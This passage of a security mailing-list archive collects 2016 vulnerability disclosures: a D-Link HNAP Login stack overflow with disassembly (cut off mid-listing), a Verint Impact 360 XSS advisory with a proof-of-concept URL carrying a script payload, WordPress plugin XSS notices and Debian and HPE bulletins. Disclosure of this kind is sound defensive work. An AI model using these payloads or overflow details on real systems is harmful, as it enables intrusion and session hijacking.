products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability for any HPE supported
product:
  Web form: https://www.hpe.com/info/report-security-vulnerability
  Email: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCAAGBQJYHO7wAAoJELXhAxt7SZai+EIIAL1g5NIsNtmRdeYoCJtrOylt
FUvo4toRNpUE8LNw6zhRxkucYlaW91nOQjTBudUUxY44TAOSzieW4dtn4B897CHQ
1cJHplKSqerRbE4Q+K5fiPCF7l3jq1Hz9Fp+QIaqUiYqoojgyR3IBYt5pXZYJuI/
QLSPeD3QK7nMLjxoX5OCjsNauNxz+QQmkSuTXXLVh9ajVZ2nOu3esnLpqZbqEpkh
sDULiVLUHwBOAxhUX/WEuyYAkwwK9Qi8MjTktIlQx2m6k8kNJmk99qnYaE88bQb7
YPQLWx6rJoGD+9YmoGtcOsstDU6Qomd7kbT8Rkb/rxfsY8+TNhZzrcIve7CH9uQ=
=uHsu
-END PGP SIGNATURE-

[CVE-2016-6563 / VU#677427]: Dlink DIR routers HNAP Login stack buffer overflow

2016-11-08 Thread Pedro Ribeiro 
tl;dr

A stack bof in several Dlink routers, which can be exploited by an
unauthenticated attacker in the LAN. There is no patch as Dlink did not
respond to CERT's requests. As usual, a Metasploit module is in the
queue (see [9] below) and should hopefully be integrated soon.

The interesting thing about this vulnerability is that it affects both
ARM and MIPS devices, so exploitation is slightly different for each type.

Link to CERT's advisory:
https://www.kb.cert.org/vuls/id/677427

Link to a copy of the advisory pasted below:
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt

Have fun.

Regards,
Pedro

>> Multiple vulnerabilities in Dlink DIR routers HNAP Login function
(multiple routers affected)
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security
==
Disclosure: 07/11/2016 / Last updated: 07/11/2016

>> Background on the affected products:
"Smartphones, laptops, tablets, phones, Smart TVs, game consoles and
more – all being connected at the same time. That’s why we created the
new AC3200 Ultra Wi-Fi Router. With Tri-Band Technology and speeds up to
3.2Gbps, it delivers the necessary ultra-performance to power even the
most demanding connected homes, making it the best wireless home router
for gaming."


>> Summary:
Dlink routers expose a protocol called HNAP (Home Network Administration
Protocol) on the LAN interface. This is a SOAP protocol that allows
identification, configuration, and management of network devices. It
seems Dlink uses an implementation of this protocol to communicate with
the router's web interface over the LAN. For more information regarding
HNAP, see [1] and [2].

Dlink has a long history of vulnerabilities in HNAP. Craig Heffner in
particular seems to have found a lot of them (see [3], [4], [5], [6],
[7], [8]).

This new vulnerability occurs in the processing of XML tags inside SOAP
messages when performing the HNAP Login action. The affected function
contains two subsequent stack overflows, which can be exploited by an
unauthenticated attacker on the LAN. It affects a number of Dlink
routers which span the ARM and MIPS architectures. A Metasploit module
that exploits this vulnerability for both architectures has been
released [9].

A special thanks to CERT/CC and Trent Novelly for help with disclosing
this vulnerability to the vendor. Please refer to CERT's advisory for
more details [10].


>> Technical details:
Vulnerability: Stack buffer overflow
CVE-2016-6563
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker. See below
for other constraints.
Affected versions:
  The following MIPS devices have been confirmed to be vulnerable:
DIR-823
DIR-822
DIR-818L(W)

  The following ARM devices have been confirmed to be vulnerable:
DIR-895L
DIR-890L
DIR-885L
DIR-880L
DIR-868L -> Rev. B and C only

  There might be other affected devices which are not listed above.

---
Vulnerability details and MIPS exploitation
---

The vulnerable function, parse_xml_value (my name, not a symbol), is
called from hnap_main (a symbol in the binary) in /htdocs/cgibin.
This function takes 3 arguments: the first is the request object /
string, the second is the XML tag name to be parsed inside the request,
and the third is a pointer to where the value of that tag should be
returned.

The function tries to find the tag name inside the request object and
then extracts the tag value, copying it first to a local variable and
then to the third argument. This function is called from hnap_main when
performing the HNAP Login action to obtain the values of Action,
Username, LoginPassword and Catpcha from the SOAP request shown above.

parse_xml_value(char* request, char* XMLtag, char* tag_value)
(...)
.text:00412264 xml_tag_value_start = $s2
.text:00412264 xml_tag_value_end = $s1
.text:00412264 C30 adduxml_tag_value_start, $v0, $s0
 # s2 now points to $value
.text:00412268 C30 la  $t9, strstr
.text:0041226C C30 move$a1, xml_tag_value_end  # needle
.text:00412270 C30 jalr$t9 ; strstr
.text:00412274 C30 move$a0, xml_tag_value_start  #
haystack
.text:00412278 C30 lw  $gp, 0xC30+var_C20($sp)
.text:0041227C C30 beqz$v0, loc_4122BC
.text:00412280 C30 subuxml_tag_value_end, $v0,
xml_tag_value_start  # s1 now holds the ptr to value$
.text:00412284 C30 bltzxml_tag_value_end, loc_4122BC
.text:00412288 C30 addiu   $s0, $sp, 0xC30+xml_tag_var
.text:0041228C C30 la  $t9, strncpy
.text:00412290 C30 move$a2, xml_tag_value_end  # n
.text:00412294 C30 move$a1, xml_tag_value_start  # src
.text:00412298 C30 adduxml_tag_value_

[SECURITY] [DSA 3707-1] openjdk-7 security update

2016-11-08 Thread Moritz Muehlenhoff 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

- -
Debian Security Advisory DSA-3707-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
November 07, 2016 https://www.debian.org/security/faq
- -

Package: openjdk-7
CVE ID : CVE-2016-5542 CVE-2016-5554 CVE-2016-5573 CVE-2016-5582
 CVE-2016-5597

Several vulnerabilities have been discovered in OpenJDK, an
implementation of the Oracle Java platform, resulting in breakouts
of the Java sandbox or denial of service.

For the stable distribution (jessie), this problem has been fixed in
version 7u111-2.6.7-2~deb8u1.

We recommend that you upgrade your openjdk-7 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-

iQIcBAEBCAAGBQJYIMeeAAoJEBDCk7bDfE428I8P/3Y3DfzmBNUvlIetjhdYybs5
2CwbMHgdLUbtV6hIO6XqKunOaENqxTNpqWzXgdY1ppAmNYbs9YrB8s76j6fdpteX
lpa84JEx543iChqIEhu2/wFDXVmp1BCD2eOXU1DafY4rDuV0CgtdisfZYdJL/crC
859ZXZXA+rwFuURvmAYTt0AIcP6F4NIB/7t44dUO6khxW8EGb86kQDutePWUwk1j
f6ZUjhKz0YRzZJKXSd/QfsVbJi2Nb5O8ZFTdzvhSUmROmnr3LjyUoKhNhRs6gS+C
rYVEQTFVLR34J2XP3Ii90HfKqdA/vhqZ7IFBjlQa2qYIJOctSI0e8wJukWBsn7wX
Jylkjbl66ZldjNnbAa6PJkGb7rPykzkJcRDnwmSufaujYQhvbg5/ui27FBFzyMyA
h9DQI4w6cryKxHprQPi+EqgrdVXrdtjjOXDbNic+HBIii2alsVInsCfVGSPjB3PR
qUaUCuyDHMFr4cSxRo4J+xNCgSBs2mR23L9M4qcOmqVI/zGAOjvyqnf67kLDM391
Y29w3I177icV5gVC/7c6x6aiga5cfHC2/0e1mfqE4ZHkzTdkOU9wpIIktKRNCCSd
pATLxbBX1Odz4b8fKunnwcgCZgePdfQJyktbhJKeKTrCG8NUZMVJjnlF8WEdObEp
tHUAzmhi8buXnhsRMvgF
=gGs3
-END PGP SIGNATURE-

Cross Site Scripting Vulnerability In Verint Impact 360

2016-11-08 Thread sanehsingh 
Overview


* Title : Cross Site Scripting Vulnerability In Verint Impact 360
* Author: Sanehdeep Singh
* Plugin Homepage: http://www.verint.com 
* Severity: Medium
* Version Affected: 11.1
* Version patched: Patches available. Contact Vendor

Description 
===

About the Product
=
Verint Impact 360 is a quality monitoring/call recording, workforce management, 
performance management, and eLearning help optimize business operations, 
customer relationships,and personnel enterprise-wide application. 

Vulnerable Parameter 


Send Message > Select Employee >

requiredPrivilegeIDs= XSS Payload

About Vulnerability
---
Verint Impact 360 application is vulnerable to a  Cross Site Scripting 
Vulnerability which allows an attacker to perform the phishing or session 
hijaking attacks. Attackers can redirect the user to fake page to obtain the 
username and passwords or inject scripts to steal the cookies which can lead to 
session hijacking attacks.

Vulnerability Class
=== 
Cross Site Scripting 
(https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)

#Live Poc URL
https://xxx/wfo/control/emp_selector_pu?selectorName=Employee_GN31&isRefreshOpenerOnClose=false&isMultiSelectEnabled=true&userRequired=false&isShowActiveEmployeesOnly=true&requiredPrivilegeIDs=alert("XSS")

Mitigation 
==
Contact Verint team for Mitigation.

Disclosure 
==
29-August-2016 Reported to Verint Team
 
Credits
===
* Sanehdeep  Singh 
* Senior Consultant
* ControlCase International Pvt Ltd.

Cross-Site Scripting vulnerability in Quotes Collection WordPress Plugin

2016-11-08 Thread Summer of Pwnage 


Cross-Site Scripting vulnerability in Quotes Collection WordPress Plugin

Yorick Koster, July 2016


Abstract

A Cross-Site Scripting vulnerability was found in the Quotes Collection
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.


OVE ID

OVE-20160712-0015


See also

https://www.pluginvulnerabilities.com/2016/09/13/reflected-cross-site-scripting-xss-vulnerability-in-quotes-collection/


Tested versions

This issue was successfully tested on Quotes Collection WordPress Plugin
version 2.0.5.


Fix

There is currently no fix available.


Details

https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_quotes_collection_wordpress_plugin.html


Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

Persistent Cross-Site Scripting in WassUp Real Time Analytics WordPress Plugin

2016-11-08 Thread Summer of Pwnage 


Persistent Cross-Site Scripting in WassUp Real Time Analytics WordPress
Plugin

Burak Kelebek, October 2016


Abstract

A stored Cross-Site Scripting (XSS) vulnerability has been found in the
WassUp Real Time Analytics WordPress Plugin. By using this vulnerability
an attacker can inject malicious JavaScript code into the application,
which will execute within the browser of any user who views the Activity
Log, in general WP admin.


OVE ID

OVE-20160717-0002


Tested versions

This issue was successfully tested on WassUp Real Time Analytics version
1.9.


Fix

This issue has been fixed in version 1.9.1.


Details

https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_wassup_real_time_analytics_wordpress_plugin.html


Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

Cross-Site Scripting in Calendar WordPress Plugin

2016-11-08 Thread Summer of Pwnage 


Cross-Site Scripting in Calendar WordPress Plugin

Remco Vermeulen, July 2016


Abstract

A Cross-Site Scripting vulnerability was found in the Calendar WordPress
Plugin. This issue allows an attacker to perform a wide variety of
actions, such as stealing Administrators' session tokens, or performing
arbitrary actions on their behalf. In order to exploit this issue, the
attacker has to lure/force a logged on WordPress Administrator into
opening a malicious website.


OVE ID

OVE-20160725-0008


Tested versions

This issue was successfully tested on Calendar WordPress Plugin version
1.3.7.


Fix

This issue is resolved in Calendar version 1.3.8.


Details

https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_calendar_wordpress_plugin.html


Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.